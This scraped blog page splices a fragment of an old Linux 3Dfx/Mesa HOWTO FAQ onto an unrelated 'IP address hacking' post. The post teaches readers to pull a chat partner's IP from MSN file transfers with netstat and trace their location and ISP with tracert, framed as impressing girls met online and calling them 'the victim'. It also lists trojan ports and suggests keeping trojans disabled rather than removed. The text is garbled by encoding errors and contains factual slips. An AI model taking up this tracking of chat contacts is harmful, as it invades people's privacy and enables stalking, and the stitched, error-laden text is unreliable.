Glide is under development by Jon M. Taylor, but has<br /> not officially been released and was put on hold till completion of<br /> GGI 0.0.9. For information about GGI see synergy.caltech.edu/~ggi/.<br /> If you are adventurous, you might find the combination of XGGI (a GGI<br /> based X Server for XFree86) and GGI for Glide an interesting prospect.<br /> There is also a GGI driver interfacing the OpenGL API; tested with<br /> unaccelerated Mesa. Essentially, this means X11R6 running on a Voodoo<br /> Graphics (tm), using either Mesa or Glide directly.<br /><br /><br /><br /> 9. FAQ: OpenGL/Mesa?<br /><br /><br /><br /> 9.1. What is OpenGL?<br /><br /> OpenGL is an immediate mode graphics programming API originally<br /> developed by SGI based on their previous proprietary Iris GL, and<br /> became in industry standard several years ago. It is defined and<br /> maintained by the Architectural Revision Board (ARB), an organization<br /> that includes members as SGI, IBM, and DEC, and Microsoft.<br /><br /> OpenGL provides a complete feature set for 2D and 3D graphics<br /> operations in a pipelined hardware accelerated architecture for<br /> triangle and polygon rendering. In a broader sense, OpenGL is a<br /> powerful and generic toolset for hardware assisted computer graphics.<br /><br /><br /><br /> 9.2. Where to get additional information on OpenGL?<br /><br /> The official site for OpenGL maintained by the members of the ARB, is<br /> www.opengl.org,<br /><br /> A most recommended site is Mark Kilgard's Gateway to OpenGL Info at<br /> reality.sgi.com/mjk_asd/opengl-links.html: it provides pointers to<br /> book, online manual pages, GLUT, GLE, Mesa, ports to several OS, tons<br /> of demos and tools.<br /><br /> If you are interested in game programming using OpenGL, there is the<br /> OpenGL-GameDev-L@fatcity.com at Listserv@fatcity.com. Be warned, this<br /> is a high traffic list with very technical content, and you will<br /> probably prefer to use procmail to handle the 100 messages per day<br /> coming in. You cut down bandwidth using the SET OpenGL-GameDev-L<br /> DIGEST command. It is also not appropriate if you are looking for<br /> introductions. The archive is handled by the ListServ software, use<br /> the INDEX OpenGL-GameDev-L and GET OpenGL-GameDev-L "filename"<br /> commands to get a preview before subscribing.<br /><br /><br /><br /> 9.3. Is Glide an OpenGL implementation?<br /><br /> No, Glide is a proprietary 3Dfx API which several features specific to<br /> the Voodoo Graphics (tm) and Voodoo Rush (tm). A 3Dfx OpenGL is in<br /> preparation (see below). Several Glide features would require<br /> EXTensions to OpenGL, some of which already found in other<br /> implementations (e.g. paletted textures).<br /><br /> The closest thing to a hardware accelerated Linux OpenGL you could<br /> currently get is Brian Paul's Mesa along with David Bucciarelli's Mesa<br /> Voodoo driver (see below).<br /><br /><br /><br /> 9.4. Is there an OpenGL driver from 3Dfx?<br /><br /> Both the 3Dfx website and the Quantum3D website announced OpenGL for<br /> Voodoo Graphics (tm) to be available 4Q97. The driver is currently in<br /> Beta, and accessible only to registered deverloper's under written<br /> Beta test agreement.<br /><br /> A linux port has not been announced yet.<br /><br /><br /><br /> 9.5. Is there a commercial OpenGL for Linux and 3Dfx?<br /><br /> I am not aware of any third party commercial OpenGL that supports the<br /> Voodoo Graphics (tm). Last time I paid attention, neither MetroX nor<br /> XInside OpenGL did.<br /><br /><br /><br /> 9.6. What is Mesa?<br /><br /> Mesa is a free implementation of the OpenGL API, designed and written<br /> by Brian Paul, with contributions from many others. Its performance is<br /> competitive, and while it is not officially certified, it is an almost<br /> fully compliant OpenGL implementation conforming to the ARB<br /> specifications - more complete than some commercial products out,<br /> actually.<br /><br /><br /><br /> 9.7. Does Mesa work with 3Dfx?<br /><br /> The latest Mesa MesaVer; release works with Linux Glide 2.4. In fact,<br /> support was included in earlier versions, however, this driver is<br /> still under development, so be prepared for bugs and less than optimal<br /> performance. It is steadily improving, though, and bugs are usually<br /> fixed very fast.<br /><br /> You will need to get the Mesa library archive from the<br /> iris.ssec.wisc.edu FTP site. It is recommended to subscribe to the<br /> mailing list as well, especially when trying to track down bugs,<br /> hardware, or driver limitations. Make sure to get the most recent<br /> distribution. A Mesa-3.0 is in preparation.<br /><br /><br /><br /> 9.8. How portable is Mesa with Glide?<br /><br /> It is available for Linux and Win32, and any application based on Mesa<br /> will only have the usual system specific code, which should usually<br /> mean XWindows vs. Windows, or GLX vs. WGL. If you use e.g. GLUT or Qt,<br /> you should get away with any system specifics at all for virtually<br /> most applications. There are only a few issues (like sampling relative<br /> mouse movement) that are not adressed by the available portable GUI<br /> toolkits.<br /><br /> Mesa/Glide is also available for DOS. The port which is 32bit DOS is<br /> maintained by Charlie Wallace and kept up to date with the main Mesa<br /> base. See www.geocities.com/~charlie_x/.for the most current releases.<br /><br /><br /><br /> 9.9. Where to get info on Mesa?<br /><br /> The Mesa home page is at www.ssec.wisc.edu/~brianp/Mesa.html. There<br /> is an archive of the Mesa mailing list. at www.iqm.unicamp.br/mesa/.<br /> This list is not specific to 3Dfx and Glide, but if you are interested<br /> in using 3Dfx hardware to accelerate Mesa, it is a good place to<br /> start.<br /><br /><br /> 9.10. Where to get information on Mesa Voodoo?<br /><br /> For latest information on the Mesa Voodoo driver maintained by David<br /> Bucciarelli tech.hmw@plus.it see the home page at www-<br /> hmw.caribel.pisa.it/fxmesa/.<br /><br /> 9.11. Does Mesa support multitexturing?<br /><br /> Not yet (as of Mesa 2.6), but it is on the list. In Mesa you will<br /> probably have to use the OpenGL EXT_multitexture extension once it is<br /> available. There is no final specification for multitextures in<br /> OpenGL, which is supposed to be part of the upcoming OpenGL 1.2<br /> revision. There might be a Glide driver specific implementation of the<br /> extension in upcoming Mesa releases, but as long as only certain<br /> Quantum3D Obsidian boards come with multiple TMU's, it is not a top<br /> priority. This will surely change once Voodoo 2 (tm) based boards are<br /> in widespread use.<br /><br /><br /><br /> 9.12. Does Mesa support single pass trilinear mipmapping?<br /><br /> Multiple TMU's should be used for single pass trilinear mipmapping for<br /> improvement image quality without performance penalty in current Linux<br /> Glide already. Mesa support is not yet done (as of Mesa 2.6), but is<br /> in preparation.<br /><br /><br /><br /> 9.13. What is the Mesa "Window Hack"?<br /><br /> The most recent revisions of Mesa contain an experimental feature for<br /> Linux XFree86. Basically, the GLX emulation used by Mesa copies the<br /> contents of the Voodoo Graphics (tm) board's most recently finished<br /> framebuffer content into video memory on each glXSwapBuffers call.<br /> This feature is also available with Mesa for Windows.<br /><br /> This obviously puts some drain on the PCI, doubled by the fact that<br /> this uses X11 MIT SHM, not XFree86 DGA to access the video memory. The<br /> same approach could theoretically be used with e.g. SVGA. The major<br /> benefit is that you could use a Voodoo Graphics (tm) board for<br /> accelerated rendering into a window, and that you don't have to use<br /> the VGA passthrough mode (video output of the VGA board deteoriates in<br /> passing through, which is very visible with high end monitors like<br /> e.g. EIZO F784-T).<br /><br /> Note that this experimental feature is NOT Voodoo Rush (tm) support by<br /> any means. It applies only to the Voodoo Graphics (tm) based boards.<br /> Moreover, you need to use a modified GLUT, as interfacing the window<br /> management system and handling the events appropriately has to be done<br /> by the application, it is not handled in the driver.<br /><br /> Make really sure that you have enabled the following environment<br /> variables:<br /><br /> ______________________________________________________________________<br /> export SST_VGA_PASS=1 # to stop video signal switching<br /> export SST_NOSHUTDOWN=1 # to stop video signal switching<br /> export MESA_GLX_FX="window" # to initiate Mesa window mode<br /> ______________________________________________________________________<br /><br /><br /> If you manage to forget one of the SST variables, your VGA board will<br /> be shut off, and you will loose the display (but not the actual X). It<br /> is pretty hard to get that back being effectively blind.<br /><br /> Finally, note that the libMesaGL.a (or .so) library can contain<br /> multiple client interfaces. I.e. the GLX, OSMesa, and fxMesa (and<br /> even SVGAMesa) interfaces call all be compiled into the same<br /> libMesaGL.a. The client program can use any of them freely, even<br /> simultaneously if it's careful.<br /><br /><br /><br /> 9.14. How about GLUT?<br /><br /> Mark Kilgard's GLUT distribution is a very good place to get sample<br /> applications plus a lot of useful utilities. You will find it at<br /> reality.sgi.com/mjk_asd/glut3/, and you should get it anyway. The<br /> current release is GLUT 3.6, and discussion on a GLUT 3.7 (aka<br /> GameGLUT) has begun. Note that Mark Kilgard has left SGI recently, so<br /> the archive might move some time this year - for the time being it<br /> will be kept at SGI.<br /><br /> There is also a GLUT mailing list, glut@perp.com. Send mail to<br /> majordomo@perp.com, with the (on of the) following in the body of your<br /> email message:<br /><br /> ______________________________________________________________________<br /> help<br /> info glut<br /> subscribe glut<br /> end<br /> ______________________________________________________________________<br /><br /><br /><br /> As GLUT handles double buffers, windows, events, and other operations<br /> closely tied to hardware and operating system, using GLUT with Voodoo<br /> Graphics (tm) requires support, which is currently in development<br /> within GLX for Mesa. It already works for most cases.<br /><br /><br /><br /> 10. FAQ: But Quake?<br /><br /> 10.1. What about that 3Dfx GL driver for Quake?<br /><br /> The 3Dfx Quake GL, aka mini-driver, aka miniport, aka Game GL, aka<br /> 3Dfx GL alpha, implemented only a Quake-specific subset of OpenGL (see<br /> http://www.cs.unc.edu/~martin/3dfx.html for an inofficial list of<br /> supported code paths). It is not supported, and not updated anymore.<br /> It was a Win32 DLL (opengl32.dll) released by 3Dfx and was available<br /> for Windows only. This DLL is not, and will not be ported to Linux.<br /><br /><br /> 10.2. Is there a 3Dfx based glQuake for Linux?<br /><br /> Yes. A Quake linuxquake v0.97 binary has been released based on Mesa<br /> with Glide. The Quake2 q2test binary for Linux and Voodoo Graphics<br /> (tm) has been made available as well. A full Quake2 for Linux was<br /> released in January 1998, with linuxquake2-3.10. Dave "Zoid" Kirsch is<br /> the official maintainer of all Linux ports of Quake, Quakeworld, and<br /> Quake2, including all the recent Mesa based ports. Note that all Linux<br /> ports, including the Mesa based ones, are not officially supported by<br /> id Software.<br /><br /> See ftp.idsoftware.com/idstuff/quake/unix/ for the latest releases.<br /><br /><br /><br /> 10.3. Does glQuake run in an XFree86 window?<br /><br /> A revision of Mesa and the Mesa-based Linux glQuake is in preparation.<br /> Mesa already does support this by GLX, but Linux glQuake does not use<br /> GLX.<br /><br /><br /><br /> 10.4. Known Linux Quake problems?<br /><br /> Here is an excerpt, as of January 7th, 1998. I omitted most stuff not<br /> specific to &3Dfx; hardware.<br /><br /> o You really should run Quake2 as root when using the SVGALib and/or<br /> GL renders. You don't have to run as root for the X11 refresh, but<br /> the modes on the mouse and sound devices must be read/writable by<br /> whatever user you run it as. Dedicated server requires no special<br /> permissions.<br /><br /> o X11 has some garbage on the screen when 'loading'. This is normal<br /> in 16bit color mode. X11 doesn't work in 24bit (TrueColor). It<br /> would be very slow in any case.<br /><br /> o Some people are experiencing crashes with the GL renderer. Make<br /> sure you install the libMesa that comes with Quake2! Older versions<br /> of libMesa don't work properly.<br /><br /> o If you are experience video 'lag' in the GL renderer (the frame<br /> rate feels like it's lagging behind your mouse movement) type<br /> "gl_finish 1" in the console. This forces update on a per frame<br /> basis.<br /><br /> o When running the GL renderer, make sure you have killed selection<br /> and/or gpm or the mouse won't work as they won't "release" it while<br /> Quake2 is running in GL mode.<br /><br /><br /> 10.5. Know Linux Quake security problems?<br /><br /> As Dave Kirsch posted on January 28th, 1998: an exploit for Quake2<br /> under Linux has been published. Quake2 is using shared libraries.<br /> While the READMRE so far does not specifically mention it, note that<br /> Quake2 should not be setuid.<br /><br /> If you want to use the ref_soft and ref_gl renderers, you should run<br /> Quake2 as root. Do not make the binary setuid. You can only run both<br /> those renderers at the console only, so being root is not that much of<br /> an issue.<br /><br /> The X11 render does not need any root permissions (if /dev/dsp is<br /> writable by others for sound). The dedicated server mode does not<br /> need to be root either, obviously.<br /><br /> Problems such as root requirements for games has been sort of a sore<br /> spot in Linux for a number of years now. This is one of the goals that<br /> e.g. GGI is targetting to fix. A ref_ggi might be supported in the<br /> near future.<br /><br /><br /> 10.6. Does LinuxQuake use multitexturing?<br /><br /> To my understadnding, glQuake will use a multitexture EXTension if the<br /> OpenGL driver in question offers it. The current Mesa implementation<br /> and the Glide driver for Linux do not yet support this extension, so<br /> for the time being the answer is no. See section on Mesa and<br /> multitexturing for details.<br /> 10.7. Where can I get current information on Linux glQuake?<br /><br /> Try some of these sites: the "The Linux Quake Resource" at<br /> linuxquake.telefragged.com, or the "Linux Quake Page" at<br /> www.planetquake.com/threewave/linux/. Alternatively, you could look<br /> for Linux Quake sites in the "SlipgateCentral" database at<br /> www.slipgatecentral.com.<br /><br /><br /><br /> 11. FAQ: Troubleshooting?<br /><br /> 11.1. Has this hardware been tested?<br /><br /> See hardware requirements list above. I currently do not maintain a<br /> conclusive list of vendors and boards, as no particular board specific<br /> problems have been verified. Currently, only 3Dfx and Quantum3D<br /> provide boards for testing to the developers, so Quantum3D consumer<br /> boards are a safe bet. Every other Voodoo Graphics (tm) based board<br /> should work, too. I have reports regarding the Orchid Righteous 3D,<br /> Guillemot Maxi 3D Gamer, and Diamond Monster 3D.<br /><br /> If you are a board manufacturer who wants to make sure his Voodoo<br /> Graphics (tm), Voodoo Rush (tm) or Voodoo 2 (tm) boards work with<br /> upcoming releases of Linux, Xfree86, Linux Glide and/or Mesa, please<br /> contact me, and I will happily forward your request to the persons<br /> maintaining the drivers in question. If you are interested in support<br /> for Linux Glide on other then the PC platfrom, e.g. DEC Alpha, please<br /> contact the maintainer of Linux Glide Daryll Strauss, at<br /> daryll@harlot.rb.ca.us<br /><br /><br /><br /> 11.2. Failed to change I/O privilege?<br /><br /> You need to be root, or setuid your application to run a Glide based<br /> application. For DMA, the driver accesses /dev/mem, which is not<br /> writeable for anybody but root, with good reasons. See the README in<br /> the Glide distribution for Linux.<br /><br /><br /><br /> 11.3. Does it work without root privilege?<br /><br /> There are compelling case where the setuid requirement is a problem,<br /> obviously. There are currently solutions in preparation, which require<br /> changes to the library internals itself.<br /><br /><br /><br /> 11.4. Displayed images looks awful (single screen)?<br /><br /> If you are using the analog pass through configuration, the common<br /> SVGA or X11 display might look pretty bad. You could try to get a<br /> better connector cable than the one provided with the accelerator<br /> board (the ones delivered with the Diamond Monster 3D are reportedly<br /> worse then the one accompanying the Orchid Righteous 3D), but up to a<br /> degree there will inevitably be signal loss with an additional<br /> transmission added.<br /><br /> If the 640x480 full screen image created by the accelerator board does<br /> look awful, this might indicate a real hardware problem. You will have<br /> to contact the board manufacturer, not 3Dfx for details, as the<br /> quality of the video signal has nothing to do with the accelerator -<br /> the board manufacturer chooses the RAMDAC, output drivers, and other<br /> components responsible.<br /><br /><br /><br /> 11.5. The last frame is still there (single or dual screen)?<br /><br /> You terminated your application with Ctrl-C, or it did not exit<br /> normally. The accelerator board will dutifully provide the current<br /> content of the framebuffer as a video signal unless told otherwise.<br /><br /><br /><br /> 11.6. Powersave kicks in (dual screen)?<br /><br /> When you application terminates in dual screen setups, the accelerator<br /> board does not provide video output any longer. Thus powersave kicks<br /> each time. To avoid this, use<br /><br /> ______________________________________________________________________<br /> setenv SST_DUALSCREEN 1<br /> ______________________________________________________________________<br /><br /><br /><br /> 11.7. My machine seem to lock (X11, single screen)?<br /><br /> If you are running X when calling a Glide application, you probably<br /> moved the mouse out of the window, and the keyboard inputs do not<br /> reach the application anymore.<br /><br /> If you application is supposed to run concurrently with X11, it is<br /> recommend to expose a full screen window, or use the XGrabPointer and<br /> XGrabServer functions to redirect all inputs to the application while<br /> the X server cannot access the display. Note that grabbing all input<br /> with XGrabPointer and XGrabServer does not qualify as well-behaved<br /> application, and that your program might block the entire system.<br /><br /> If you experience this problem without running X, be sure that there<br /> is no hardware conflict (see below).<br /><br /><br /> 11.8. My machine locks (single or dual screen)?<br /><br /> If the system definitely does not respond to any inputs (you are<br /> running two displays and know about the loss of focus), you might<br /> experience a more or less subtle hardware conflict. See installation<br /> troubleshooting section for details.<br /><br /> If there is no obvious address conflict, there might still be other<br /> problems (below). If you are writing your own code the most common<br /> reason for locking is that you didn't snap your vertices. See the<br /> section on snapping in the Glide documentation.<br /><br /><br /> 11.9. My machine locks (used with S3 VGA board)?<br /><br /> It is possible you have a problem with memory region overlap specific<br /> to S3. There is some info and a patch to the so-called S3 problem in<br /> the 3Dfx web site, but these apply to Windows only. To my<br /> understanding, the cause of the problem is that some S3 boards (older<br /> revisions of Diamond Stealth S3 968) reserve more memory space than<br /> actually used, thus the Voodoo Graphics (tm) has to be mapped to a<br /> different location. However, this has not been reported as a problem<br /> with Linux, and might be Windows-specific.<br /> 11.10. No address conflict, but locks anyway?<br /><br /> If you happen to use a motherboard with non-standard or incomplete PCI<br /> support, you could try to shuffle the boards a bit. I am running an<br /> ASUS TP4XE that has that non-standard modified "Media Slot", i.e. PCI<br /> slot4 with additional connector for ASUS-manufactured SCSI/Sound combo<br /> boards, and I experienced severe problems while running a Diamond<br /> Monster 3D in that slot. The system operates flawlessly since I put<br /> the board in one of the regular slots.<br /><br /><br /><br /> 11.11. Mesa runs, but does not access the board?<br /><br /> Be sure that you recompiled all the libraries (including the toolkits<br /> the demo programs use - remember that GLUT does not yet support Voodoo<br /> Graphics (tm)), and that you removed the older libraries, run<br /> ldconfig, and/or set your LD_LIBRARY_PATH properly. Mesa supports<br /> several drivers in parallel (you could use X11 SHM, off screen<br /> rendering, and Mesa Voodoo at the same time), and you might have to<br /> create and switch contexts explicitely (see MakeCurrent function) if<br /> the Voodoo Graphics (tm) isn't chosen by default.<br /><br /><br /><br /> 11.12. Resetting dual board SLI?<br /><br /> If a Quantum 3D Obsidian board using in an SLI setup exits abruptly<br /> (i.e., the application crashes, or is aborted by user), the boards are<br /> left in an undefined state. With the dual-board set, you can run a<br /> program called resetsli to reset them. Until you run the resetsli<br /> program, you will not be able to re-initialize the Obsidian board.<br /><br /><br /><br /> 11.13. Resetting single board SLI?<br /><br /> The resetsli program mentioned above does not yet work with a single<br /> board Obsidian SLI (e.g. the Obsidian 100-4440SB). You will have to<br /> reboot your system by reset in order to reset the board..http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-386824984204544192009-06-23T10:22:00.000-07:002009-06-23T10:23:31.575-07:00IP address hackingIn here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.<br /><br />Well I guess its one of the most important must learn manul for boys out there if you want to impress your friends particularly gals whom youâ??ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .<br /><br />In the practical execution of this manual you donâ??t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.<br /><br /><br /><br />What is IP and how to get the IP of a remote system::<br /><br /><br /><br />Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victimâ??s computer.<br /><br />Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:<br /><br /><br /><br />Address Class Dotted Decimal Notation Ranges<br /><br />Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx<br /><br />Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx<br /><br />Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx<br /><br /><br /><br />The various classes will be clearer after reading the next few lines.<br /><br /><br /><br />Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.<br /><br />In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".<br /><br /><br /><br />A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as<br /><br />"24's" and is commonly used by most ISP's.<br /><br /><br /><br />Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.<br /><br /><br /><br />Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:<br /><br /><br /><br />xxx.xxx.zzz.yyy<br /><br /><br /><br />where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.<br /><br />***********************<br /><br /><br /><br />For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?<br /><br /><br /><br />So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.<br /><br /><br /><br />This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.<br /><br /><br /><br />In my country, say there are three main ISPâ??s:<br /><br /><br /><br />ISP Name Network Address Allotted<br /><br /><br /><br />ISP I 203.94.47.xx<br /><br />ISP II 202.92.12.xx<br /><br />ISP III 203.91.35.xx<br /><br /><br /><br />Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.<br /><br /><br /><br />Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISPâ??s in the world, could you? If yes please send it to me J.<br /><br /><br /><br />Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.<br /><br />Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoftâ??s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :<br /><br /><br /><br />Proto Local Address Foreign Address State<br /><br />TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED<br /><br /><br /><br />Now you got the IP address of hotmail ass 64.4.xx.xx .<br /><br />Similarly you can figure out the IP address of most http or ftp connections.<br /><br /><br /><br />To know your own IP type the following command in a dos windows<br /><br />C:<br />etstat â??n<br /><br />[this commands converts the IP name into IP addresses]<br /><br />this is what you will probably see on typing the above command :<br /><br /><br /><br />Proto Local Address Foreign Address State<br /><br />TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED<br /><br />TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2<br /><br />TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT<br /><br />TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT<br /><br />TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT<br /><br />TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED<br /><br />TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT<br /><br /><br /><br />Here 203.xx.251.161 is your IP address.<br /><br /><br /><br />Now lets clarify the format used by netstat :<br /><br /><br /><br />Proto : It shows the type of protocol the connection with the remote system is using.<br /><br />Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.<br /><br /><br /><br />Local Address : It shows the local address ie the local IP. When the netstat command is executed without â??n switch then the name of the local system is displayed and when the netstat is executed with â??n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.<br /><br />xxx.yyy.zzz.aaa:1024<br /><br />in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system<br /><br /><br /><br />Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with â??n switch then you directly get the IP of the victim but if the netstat is executed without â??n switch then you will get the address of the remote system. Something like<br /><br /><br /><br />C:<br />etstat<br /><br />Proto Local Address Foreign Address State<br /><br />TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED<br /><br /><br /><br />Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.<br /><br /><br /><br />Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.<br /><br />Below I have produced a list of ports and popular services generally found to be running.<br /><br />21 :: FTP port<br /><br />80 :: http port<br /><br />23 :: Telnet port<br /><br /><br /><br />Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.<br /><br />Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesnâ??t work for all Trojans].<br /><br /><br /><br />Netbus :: 12345(TCP)<br /><br />Subseven :: 27374(TCP)<br /><br />Girl Friend :: 21554(TCP)<br /><br />Back Oriface :: 31337 (UDP)<br /><br /><br /><br />Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for youâ??ll.<br /><br /><br /><br />How to get the IP of a remote system while chatting through msn messenger ::<br /><br /><br /><br />This is a tutorial on how to get IP address from MSN messenger. This is actually<br />a really easy thing to do. It is not like going through the hard time and reversing<br />MSN messenger like many people think.<br /><br />The IP address is only given when you accept or are sending a file through MSN<br />messenger. When you send IM's, the message is sent through the server thus hiding<br />your victims IP and your. But when you send a file or recieve a file, it is direct<br />connection between the two computers.<br /><br />To obtain the IP accept a file transfer or send a file to the victim, when the file<br />sending is under way from the dos prompt type "netstat" without the quotation marks.<br />You should get a table like this:<br /><br />Proto Local Address Foreign Address State<br />TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED<br />TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED<br />TCP kick: <remote> ESTABLISHED<br /><br />The top name in the list is the server's address for IMing. There could be many of<br />the second name in the list, as a new connection is made to the server for every<br />room you are IMing to. You are looking for the address of the remote host in<br />this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or â??203..64.90.6â??.<br />without the quotation marks.<br />All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.<br /><br /><br />Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.<br /><br /><br /><br />Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b<br /><br />[ftp://ftp.visualware.com/pub/vr/vr.exe]<br /><br />Neotrace<br /><br />[http://www.neoworx.com/download/NTX325.exe]<br /><br />or by our way ie. Using MS DOS or any other version of DOS.<br /><br />Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.<br /><br /><br /><br />Let us take a look at tracert tool provided for DOS by Microsoft.<br /><br />It is a very handy tool for peoples need to trace down an IP.<br /><br />Just open any DOS windows and type tracert.<br /><br /><br /><br />C:windows>tracert<br /><br /><br /><br />Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name<br /><br /><br />Options:<br /><br />-d Do not resolve addresses to hostnames.<br /><br />-h maximum_hops Maximum number of hops to search for target.<br /><br />-j host-list Loose source route along host-list.<br /><br />-w timeout Wait timeout milliseconds for each reply.<br /><br /><br />You will now see a description of the tracert command and the switches associated with it.<br /><br />Well these switches doesnâ??t makes much difference. All you can do is to increase the timeout in milliseconds by using â??w switch if you are using a slow connection and the â??d switch if you wish not resolve address to hostnames by default.<br /><br />By default tracert performs a maximum of 30 hops trace. Using the â??h switch you can specify the number of hops to perform.<br /><br />Now its time for execution.<br /><br />Let us trace down the IP yahoo.com [216.115.108.243]<br /><br /><br /><br />TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202<br /><br /><br /><br />C:WINDOWS>tracert yahoo.com<br /><br /><br /><br />Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:<br /><br /><br /><br />1 308 ms 142 ms 127 ms 203.94.246.35<br /><br />2 140 ms 135 ms * 203.94.246.1<br /><br />3 213 ms 134 ms 132 ms 203.94.255.33<br /><br />4 134 ms 130 ms 129 ms 203.200.64.29<br /><br />5 122 ms 135 ms 131 ms 203.200.87.75<br /><br />6 141 ms 137 ms 121 ms 203.200.87.15<br /><br />7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]<br /><br />8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]<br /><br />9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]<br /><br />10 * * * Request timed out.<br /><br />11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]<br /><br />12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]<br /><br />13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]<br /><br />14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]<br /><br />15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]<br 